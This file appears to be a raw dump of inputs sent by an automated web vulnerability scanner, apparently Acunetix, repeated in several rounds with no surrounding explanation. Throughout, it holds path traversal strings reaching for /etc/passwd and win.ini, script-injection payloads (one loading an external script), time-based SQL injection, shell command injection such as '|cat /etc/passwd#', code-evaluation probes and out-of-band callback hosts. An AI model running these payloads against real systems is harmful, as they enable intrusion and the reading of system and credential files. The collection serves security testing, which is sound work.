1_978397

1

1

1

1

acu8306\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8306

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

acux4780\xc0\xbez1\xc0\xbcz2a\x90bcxuca4780

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(975164)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(991816)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(935690)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995933></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(979776)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(975358)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9109671*9595823)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959373)"></g></svg>

1

1

'+response.write(9109671*9595823)+'

1<div style=width:expression(prompt(942826))>

&cat /etc/passwd&

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

"+response.write(9109671*9595823)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'&cat /etc/passwd&'

WEB-INF\web.xml

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(913709)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942206)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

1<img src=xyz OnErRor=prompt(990728)>

${100017+100160}

`cat /etc/passwd`

1

1

1

1<img/src=">" onerror=alert(967993)>

1

-1))

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(942815)</sCripT>

1&n916947=v993222

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

gUGUwMmq'

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

1

1&lt

1

)

1

1some_inexistent_file_with_long_name%00.jpg

UDBllc6C')

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(963249) //\xf6>

1

"|"ld

!(()&&!|*|*|

1

0AtAxaPc'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(942434)>

1

1

^(#$!@#$)(()))******

'"()

-1

'

1

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

"

-1)

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1_vrkOl <ScRiPt >prompt(926852)</ScRiPt>

1

1

-1))

1

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

Q2xIFK2L'

http://hitnyM27hCwQc.bxss.me/

&dir

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

'&dir&'

kkfwj3Dg')

1

1

1

1

1

1

comments

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

Ov29OmKY'))

|dir

file:///etc/passwd

comments

1

'"

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(901444)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

comments/.

'"()&%<ScRiPt >prompt(910642)</ScRiPt>

<!--

1

1

1

1

"|dir

WEB-INF/web.xml

1

1_903975

1

1

1

1

1

acu8827\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8827

1

WEB-INF\web.xml

1

1

1

1

1

acux3553\xc0\xbez1\xc0\xbcz2a\x90bcxuca3553

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(979366)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(969881)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(906103)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946832></ScRiPt>

1

1

1<ScRiPt >prompt(900402)</ScRiPt>

................windowswin.ini

1

1<video><source onerror="javascript:prompt(941039)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939401)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<div style=width:expression(prompt(959734))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<iframe src='data:text/html

1

1

response.write(9431212*9367740)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<body onload=prompt(927682)>

1

'+response.write(9431212*9367740)+'

&cat /etc/passwd&

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943970)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

"+response.write(9431212*9367740)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=xyz OnErRor=prompt(905796)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(949807)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1

${99254+99568}

1<ScRiPt%20>prompt(992524)</sCripT>

1

cat /etc/passwd

1

-1

1

1&lt

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

\xf6<img acu onmouseover=prompt(905459) //\xf6>

1&n998795=v960333

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

)

-1))

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1<input autofocus onfocus=prompt(906182)>

VSgzqbEy'

1

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

'"()

^(#$!@#$)(()))******

Pst1ySJq')

1

testasp.vulnweb.com

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

Hox1RDVb'))

1

1

1

1_NftZ7 <ScRiPt >prompt(963407)</ScRiPt>

1

/etc/passwd

"

1

-1

1

1

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

http://hitB8dSucmG44.bxss.me/

1

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

SEYnLYBJ'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

comments

1

1

||cat /etc/passwd

qnqQ2El5')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

comments/.

'"

&dir

1

1

Vp4hx5GX'))

1

file:///etc/passwd

1

1'"()&%<ScRiPt >prompt(949342)</ScRiPt>

1

1

<!--

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1

1

'"()&%<ScRiPt >prompt(936898)</ScRiPt>

1

1

1

"&dir&"

1_917201

1

1

WEB-INF/web.xml

1

1

|dir

1

acu9702\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9702

WEB-INF\web.xml

1

1

acux8891\xc0\xbez1\xc0\xbcz2a\x90bcxuca8891

1

'|dir

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(940652)</ScRiPt>

1

1

"|dir

1<script>prompt(944812)</script>

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(923510)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945317></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(982736)</ScRiPt>

................windowswin.ini

1

1

1

1<video><source onerror="javascript:prompt(910164)">

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961158)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<div style=width:expression(prompt(931201))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9535017*9985482)

1

1<iframe src='data:text/html

1

'+response.write(9535017*9985482)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<body onload=prompt(919076)>

"+response.write(9535017*9985482)+"

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(939076)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(976099)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

-1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1

1<img/src=">" onerror=alert(956463)>

1

SomeCustomInjectedHeader:injected_by_wvs

-1)

1

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<ScRiPt%20>prompt(904919)</sCripT>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

`cat /etc/passwd`

1

1

${99276+99615}

1

1&lt

1

1

|cat /etc/passwd#

ADMUsOq6'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

\xf6<img acu onmouseover=prompt(977781) //\xf6>

1

1

1

1&n935367=v988828

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

c8XVm1UG')

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1<input autofocus onfocus=prompt(916783)>

qltoEeYD'))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

/etc/passwd

!(()&&!|*|*|

1

<a href='http://www.acunetix.com'>website security</a>

1

'"()

-1

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

1

1

[url=http://www.acunetix.com]website security[/url]

1

-1)

'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_IpZqm <ScRiPt >prompt(983478)</ScRiPt>

'

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}

1

qweSkxDT'

1

1

1

http://hito7d8mUk8Jj.bxss.me/

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

acunetix_wvs_invalid_filename

1

file:///etc/passwd

FIWsckgR')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

&dir

1

1

1

vJ7uSKr0'))

1

/\../\../\../\../\../\../\../etc/passwd

1

1

comments

WEB-INF/web.xml

1

1

'&dir&'

1

'"

1'"()&%<ScRiPt >prompt(935359)</ScRiPt>

comments

WEB-INF\web.xml

1

1

<!--

1

"&dir&"

'"()&%<ScRiPt >prompt(924716)</ScRiPt>

comments/.

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1_970543

|dir

../../../../../../../../../../boot.ini

1

1

1

1

'|dir

acu3287\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3287

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

"|dir

acux5424\xc0\xbez1\xc0\xbcz2a\x90bcxuca5424

1

1

................windowswin.ini

1<ScRiPt >prompt(966918)</ScRiPt>

1

1

1

1

1

1<script>prompt(902255)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(934704)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?922694></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(922805)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(949184)">

1

1

response.write(9997249*9204698)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931437)"></g></svg>

WEB-INF\web.xml

1

1

'+response.write(9997249*9204698)+'

&cat /etc/passwd&

1

1<div style=width:expression(prompt(913941))>

1

"+response.write(9997249*9204698)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(902922)>

1

1

cat /etc/passwd

1

1

-1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984715)>

1

`cat /etc/passwd`

-1)

1

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1<img src=xyz OnErRor=prompt(983875)>

1

-1))

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

uc8au2hl'

1<img/src=">" onerror=alert(976516)>

1

'|'ld

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"|"ld

1<ScRiPt%20>prompt(910133)</sCripT>

B0AmBayJ')

1

${100097+100398}

1&n945775=v970769

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1

3h9l7qxY'))

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

1

\xf6<img acu onmouseover=prompt(919298) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

^(#$!@#$)(()))******

1

"

/etc/passwd

testasp.vulnweb.com

1<input autofocus onfocus=prompt(958416)>

1

-1)

'

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

-1))

1

<a href='http://www.acunetix.com'>website security</a>

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

'&dir&'

kIh50o0C'

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

1_7jds2 <ScRiPt >prompt(984697)</ScRiPt>

1

1

"&dir&"

1

HgboOrbt')

1

acunetix_wvs_invalid_filename

1

file:///etc/passwd

http://hitXgLtLMKEtq.bxss.me/

1

1

|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

YKkRLGmO'))

comments

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

http://www.acunetix.tst

1

comments

'"

1

1

1'"()&%<ScRiPt >prompt(949831)</ScRiPt>

"|dir

WEB-INF/web.xml

1

<!--

comments/.

1

1

WEB-INF\web.xml

1

'"()&%<ScRiPt >prompt(954085)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1_987240

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acu5714\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5714

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux5131\xc0\xbez1\xc0\xbcz2a\x90bcxuca5131

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(970251)</ScRiPt>

1

1

1

1

1<script>prompt(951651)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(902334)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?939446></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(936988)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(957165)">

response.write(9950413*9645485)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929912)"></g></svg>

1

WEB-INF/web.xml

1

'+response.write(9950413*9645485)+'

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<div style=width:expression(prompt(912483))>

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9950413*9645485)+"

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(933367)>

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945957)>

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100132+99049}

1

1&n948868=v922195

1<img src=xyz OnErRor=prompt(916913)>

1

-1)

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(955349)>

1

)

1

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1<ScRiPt%20>prompt(932917)</sCripT>

OyGqa2Tr'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

!(()&&!|*|*|

testasp.vulnweb.com

1&lt

'"()

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

6NmdNYPA')

1

1

'

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(998189) //\xf6>

1

1

Z0kZjNym'))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

1<input autofocus onfocus=prompt(958961)>

"

1

1

1

/etc/passwd

acunetix_wvs_invalid_filename

-1

http://hitAriWvK0HkZ.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

-1)

comments

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

"

1

1

comments

1_ZZUp8 <ScRiPt >prompt(915495)</ScRiPt>

1

-1))

1

http://www.acunetix.tst

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

DKLX0RNA'

1

1

comments/.

1

'"

1

&dir

esAFs4bR')

1

1'"()&%<ScRiPt >prompt(958932)</ScRiPt>

1

1

1

file:///etc/passwd

1

2z4A7ZW5'))

'&dir&'

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(968700)</ScRiPt>

1

1

"&dir&"

1

WEB-INF/web.xml

1_955111

1

1

|dir

1

WEB-INF\web.xml

1

1

acu2358\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2358

1

'|dir

../../../../../../../../../../windows/win.ini

1

acux2008\xc0\xbez1\xc0\xbcz2a\x90bcxuca2008

1

1

"|dir

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(914554)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(918828)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(978810)</ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935605></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(920345)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(989174)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969109)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9729206*9202420)

1

1

1<div style=width:expression(prompt(918671))>

1

'+response.write(9729206*9202420)+'

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

"+response.write(9729206*9202420)+"

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(921072)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

../../../../../../../../../../etc/passwd.jpg

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927924)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(965725)>

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

${99265+99349}

1

-1))

1<img/src=">" onerror=alert(943384)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

|cat /etc/passwd#

c9YFM719'

1&n982402=v964403

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(945288)</sCripT>

)

ukqGkiFn')

'|'ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1&lt

/etc/passwd

1

FHFBTM8Q'))

1

testasp.vulnweb.com

1

"|"ld

^(#$!@#$)(()))******

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

\xf6<img acu onmouseover=prompt(919835) //\xf6>

1

1

'"()

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(977720)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

'

1

1

1

'

1

1

"

1

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

iFS0kO3c'

http://hitoX6vpuX4Ii.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1_qSt5G <ScRiPt >prompt(969913)</ScRiPt>

1

JuoWlVIZ')

1

file:///etc/passwd

1

comments

1

1

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'"

/\../\../\../\../\../\../\../etc/passwd

